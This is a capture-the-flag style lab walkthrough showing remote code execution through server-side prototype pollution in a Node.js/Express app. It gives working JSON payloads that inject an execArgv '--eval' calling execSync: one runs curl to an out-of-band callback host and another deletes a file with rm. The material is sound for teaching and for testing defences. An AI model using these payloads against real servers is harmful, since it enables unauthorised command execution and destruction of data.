Remote code execution via server-side prototype pollution

This lab is built on Node.js and the Express framework. It is vulnerable to server-side prototype pollution because it unsafely merges user-controllable input into a server-side JavaScript object.

Due to the configuration of the server, it’s possible to pollute Object.prototype in such a way that arbitrary system commands can be injected, that are executed on the server.

Reproduction and PoCs

Study the address change feature

  1. Log in with wiener:peter and visit the account page. Submit the form for updating your billing and delivery address.

  2. In Burp, go to the Proxy -> HTTP history tab and find the POST /my-account/change-address request.

  3. When submitting the form, the data from the fields is sent to the server as JSON. The server responds with a JSON object that appears to represent your user. This has been updated to reflect the new address information.

  4. Send the request to Burp Repeater.

Identify a prototype pollution source

  1. In Repeater, add a new property to the JSON with the name __proto__, containing an object with a json spaces property.

"__proto__": {
    "json spaces":10
}

  1. Send the request.

  2. In the Response panel, switch to the Raw tab. Notice that the JSON indentation has increased based on the value of your injected property. This strongly suggests that you have successfully polluted the prototype.

Probe for remote code execution

  1. In the browser, go to the admin panel and observe that there’s a button for running maintenance jobs.

  2. Click the button and observe that this triggers background tasks that clean up the database and filesystem. This is a classic example of the kind of functionality that may spawn node child processes.

  3. Try polluting the prototype with a malicious execArgv property that adds the --eval argument to the spawned child process. Use this to call the execSync() sink, passing in a command that triggers an interaction with the public Burp Collaborator server. For example:

"__proto__": {
    "execArgv":[
        "--eval=require('child_process').execSync('curl https://YOUR-COLLABORATOR-ID.oastify.com')"
    ]
}

  1. Send the request.

Prototype pollution

  1. In the browser, go to the admin panel and trigger the maintenance jobs again. Notice that these have both failed this time.

  2. In Burp, go to the Collaborator tab and poll for interactions. Several DNS interactions, confirming the remote code execution have been received.

Prototype pollution

Craft an exploit

  1. In Repeater, replace the curl command with a command for deleting Carlos’s file:

"__proto__": {
    "execArgv":[
        "--eval=require('child_process').execSync('rm /home/carlos/morale.txt')"
    ]
}

  1. Send the request.

Prototype pollution

  1. Go back to the admin panel and trigger the maintenance jobs again. Carlos’s file is deleted and the lab is solved.

Prototype pollution

Exploitability

The command execution sink is only invoked when an admin user triggers vulnerable functionality on the site. An attacker will need to already have escalated privileges, giving access to admin functionality; find a prototype pollution source that can be used to add arbitrary properties to the global Object.prototype; identify a gadget that can be used to inject and execute arbitrary system commands; and trigger remote execution of a command that deletes the file /home/carlos/morale.txt.